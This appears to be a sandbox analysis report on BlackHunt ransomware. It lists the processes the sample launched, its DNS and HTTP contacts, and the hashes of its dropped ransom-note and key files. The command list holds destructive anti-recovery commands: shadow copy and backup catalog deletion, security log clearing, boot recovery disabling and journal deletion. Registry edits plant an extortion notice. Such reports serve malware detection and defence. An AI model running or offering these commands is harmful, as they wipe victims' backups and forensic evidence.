"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security /e:false
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
C:\Windows\system32\schtasks.exe
SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f
C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
C:\Windows\system32\taskkill.exe
taskkill /IM mshta.exe /f
C:\Windows\system32\notepad.exe
notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 7668 -ip 7668
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 1464
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\ProgramData\#BlackHunt_Private.key
| MD5 | 73446c35218e6ae0c89544784ed6ac3c |
| SHA1 | f394cd41f1dff525d25bfbfb2d1d904a2112da54 |
| SHA256 | 87c9c27392b63318cbf789bae1474ab9887f0bdaeda89184213a609387759a58 |
| SHA512 | fb66882775d7f97a8f1df621922af4c405830ecab21dcf676024b42b6cbd450d53c51a00953eb9d5c4410e476b6c7f0c0cf91ee1db1ec2060f2e1fcc7625a67a |
C:\ProgramData\#BlackHunt_ReadMe.hta
| MD5 | e309e86aa475bf9ab6d9ec368d40fe5a |
| SHA1 | 3db62b6572867604cd091a6c518c4458308d002e |
| SHA256 | 39c0d064e4419607fa2a3b96691440bb9613e7cf28be9476dbe6c644f07a13d2 |
| SHA512 | 5d89c38896f51b2e05f3f0a209054cefe770823b929f4ed9c1275df9aaef58b44dae482a3483c295098423a0652672774797ab869dc67967b31af3dfdb151583 |
C:\ProgramData\#BlackHunt_ReadMe.txt
| MD5 | 88d5b995bf93732281a24ffa8c40ab5c |
| SHA1 | ed0d8cb268e450141673338e131ff2bd97f8b23c |
| SHA256 | 69ffdd2db3a73f5a41ba2d4b25d27661112a80f2d403112b11f53454ad5fb5c1 |
| SHA512 | ea7a88abc7583e6e50d08b8711fd93bf4d79137e68922c614c9e3ed47fdc0bfae113acd6693ffdbf24dd8c966e667ccee9bb3d958ef28fcbb4aceb9db3ef071e |